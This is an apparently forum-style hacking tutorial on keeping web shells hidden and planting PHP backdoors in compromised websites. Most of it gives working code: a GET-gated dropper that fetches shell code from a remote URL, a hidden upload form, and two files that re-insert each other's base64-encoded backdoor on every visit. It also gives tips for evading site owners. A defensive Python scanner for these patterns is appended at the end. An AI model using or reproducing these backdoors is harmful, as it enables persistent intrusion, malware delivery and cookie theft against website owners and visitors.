Shell Safety and Backdooring
Today, I will be giving a small tutorial on shell safety and backdooring your hacked websites.
I will also include some tools and code for you to use to help you on your journey.
There are many reasons for shell safety and adding a backdoor into a website that are beneficial. Here are a few.
- Keep from losing access to the site
- Keep other hackers from finding your shell
- Reupload files if the webmaster / server owners find and delete your files
- Load malware/redirect/steal cookies/etc.
So, I assume that you have a shell uploaded to a hacked server. You are sitting there, trying to figure out what you want to do with it. There are a few scenarios right off hand.
(non preferred) Deface that bastard: Well, you could ruin their index with your cheap flashing deface page with all your "greetz" to your homies and lose all your access.
(preferred) Backdoor the bitch: You could place backdoors in some of their code. Where and such depends on the code you're entering.
(better than defacing but not as good as backdooring) Just leave your shell, keep url and hope it stays
So, with these options, I will stick to the preferred methods.
Let's begin with shell security.
#1 - First off, any GOOD shell will be password protected. When deciding your password, make an MD5 hash of it and search for it on Google. If yours can be found, choose a different path. This has let me into so many shells it's ridiculous.
#2 - Another good thing to have with your shell is a basic hidden 404 page when visiting and no session has been started with it. Example: My 404 shell. This will throw people off, thinking it's really a page not found and such.
#3 - You also want to make sure your shell can't be found through text and such that shows up through dorking search engines. People will steal your shell this way.
#4 - The next important thing is not to upload too many things, db connectors, mass defacers etc., and when you do, ALWAYS DELETE THEM AFTERWARDS. You never want to leave more than 1 shell (not even recommended, I will cover this very soon) and a backdoor.
#5 - ALWAYS make sure your shell is encoded, and hard to decode.
Those are a few tips for shell security. Let's move on to backdooring, which is the best thing possible.
Backdoors are the way to go. Period. I code 90% of my backdoors in PHP. I have several different ones as they all have a different purpose. I will now give you some examples of some simple backdoors and explain their function.
#1 - Basics of a backdoor
You have 3 good options here: insert code to be run every time a page is visited, do different functions via a GET request, or, less likely, use POST variables.
An example of having a backdoor run every time the page is visited could be to recreate your shell if it happens to be deleted, or to log login information or something like that, which I frown upon really.
The best method for my own uses is to get it to show via GET request. Example: hacked.com/hackeddir/index.php?backdoor which would then show my backdoor and let me use my options.
So, what should we have in our backdoor? Well, first I assume that you want to keep your shell on the server or recreate it when it's deleted. Let's work on this!
Let's say you have a shell and can write to the index file, hacked.com/index.php.
Here is a small example of their index.
Code:
<html>
<head>
blahsldfja
</head>
<body>
php code blah blah here
</body>
</html>
To start a backdoor in it, go to just after the </html> tag and put in the following.
PHP Code:
<?phpif(isset($_GET['makeshell'])){
$filename = $_GET['makeshell'];
$shelltxt = "URL TO TEXT FILE WITH SHELL CODING IN IT";
$getcode = file_get_contents($shelltxt);
$file = fopen($filename, 'w');
fwrite($file, $getcode);
echo "Shell Created: <a href='$filename'>Link</a>";
}?>
Now, the url to utilize this would be index.php?makeshell=shellname.php (replace shellname.php with what you want your file to be)
Then, you can go to hackedsite.com/shellname.php and voilà! You got a shell made on the fly! Simple enough, right? Let's go a little more in depth.
Say instead of making a shell, you just want ability to upload files (better than hosting a url to your shell file).
You could use the following code after </html>
PHP Code:
<?php
if(isset($_GET['kupload'])){
define("MAX_FILE_SIZE", 99999999999999999); // Maximum file size is 10 mb, 10485760 is in bytes
if(isset($_POST['submit'])) {
// Files variables
$file_name = $_FILES['file']['name']; // File name
$file_size = $_FILES['file']['size']; // File size
$file_type = $_FILES['file']['type']; // The file type, if we want to upload a determinated type of file
$file_temp = $_FILES['file']['tmp_name']; // Our temporaney file
$file_error = $_FILES['file']['error']; // The files errors
$file_dest = basename($file_name); // File destination
if ($file_size <= MAX_FILE_SIZE) {
// Uploading file
if(move_uploaded_file($file_temp, $file_dest))
{
echo 'File uploaded: '.$file_dest;
echo '<p><a href="'.$file_dest.'">go to file</a> </p>';
}
else
{
echo 'Error: '.$file_error;
}
} else {
echo "This file is too big!";
}
} else {
// Uploading form
echo '<h1>add file</h1>';
echo '<form method="post" action="" enctype="multipart/form-data">
file: <input type="file" name="file"><br /><br />
<input type="submit" name="submit" class="button" value="Upload">
</form>';
echo '</div>';
}
}?>
The url to get this would be http://www.hacked.com/index.php?kupload ((**NOTE** I use kupload as just "upload" is used, and I want mine to be unique!))
You would be given an upload box. Simply upload any file as long as it's not too big; then you don't have to worry about giving away a link to a shell script or anything like that.
You can also combine both of the above, so you can quickly make a shell or upload form.
There is an unlimited amount of things you can include with this. You can make your backdoor do pretty much anything!
Another little trick is to use two backdoors that also remake the other backdoor in case one gets deleted. Obviously it's all about how well you hide your backdoor along with how much the owner of the website really pays attention.
So how would you go about this you ask? Let me show you an example.
Say you have two files. Index.php in the main directory, admin.php in /admin/ directory.
In index.php enter this code.
PHP Code:
<?php
$shell2 = "admin/admin.php";$contents = file_get_contents($shell2);$pattern = '/kupload/';$bdcode = "?><?php ".base64_decode("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");preg_match($pattern,$data,$match);
if(count($match)<1)
{
$file = fopen($shell2, 'a');
fwrite($file, $bdcode);
}?>
Now, every time index.php is visited, it will check for the presence of our uploader in admin.php. If it's not there, it will re-add it; if it is there, it does nothing.
With a little modification, you could put the same in admin.php to check index.php for the same thing. That way, it's way more likely that you will keep the backdoors for as long as possible.
Also, it's a very smart idea to encode all of your backdoors. The more it's encoded the better.
I hope you have enjoyed this small tutorial. I plan on making a part 2 to this with more sophisticated code.
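From the defender's side, the three backdoors above leave recognizable traces in a site's source: PHP appended after the closing </html> tag, a block that only acts when a specific request parameter is set and that writes files, and an encoded payload that is decoded and written into another file. The Python scanner below is an added example, not part of the original tutorial; the indicator names, function names and sample strings are assumptions made here, and a match is a lead for manual review, not proof of compromise.

```python
import re
import sys
from pathlib import Path

# Heuristics for the three backdoor shapes described in this tutorial.
PHP_BLOCK = re.compile(r"<\?php(.*?)(?:\?>|\Z)", re.S | re.I)
HTML_END = re.compile(r"</html\s*>", re.I)
WRITE_SINK = re.compile(r"\b(fopen|fwrite|file_put_contents|move_uploaded_file)\s*\(", re.I)
REQUEST_GATE = re.compile(r"isset\s*\(\s*\$_(GET|POST|REQUEST)\s*\[", re.I)
DECODER = re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def scan_php(source):
    """Return the sorted indicator names found in one PHP file's text."""
    findings = set()
    html_end = max((m.end() for m in HTML_END.finditer(source)), default=None)
    for block in PHP_BLOCK.finditer(source):
        code = block.group(1)
        writes = bool(WRITE_SINK.search(code))
        # Code placed after the document's closing tag, as the tutorial advises.
        if html_end is not None and block.start() >= html_end and code.strip():
            findings.add("php-after-closing-html")
        # A block that only acts when a request parameter is present and writes files.
        if writes and REQUEST_GATE.search(code):
            findings.add("request-gated-file-write")
        # Encoded payload decoded and written out (the re-seeding pattern).
        if writes and DECODER.search(code):
            findings.add("decode-then-write")
    return sorted(findings)

def scan_tree(root):
    """Map every flagged *.php file under root to its indicators."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples (not real site code); payloads are placeholders.
CLEAN = "<html><body><?php echo date('Y'); ?></body></html>\n"
TAMPERED = CLEAN + ("<?php if(isset($_GET['k'])){ $h = fopen('PLACEHOLDER', 'a');"
                    " fwrite($h, base64_decode('PLACEHOLDER')); } ?>")

if __name__ == "__main__":
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, ", ".join(hits))
```

Because the two-file trick re-adds a removed backdoor on the next page view, restore every flagged file from a known-good copy in the same pass rather than one at a time.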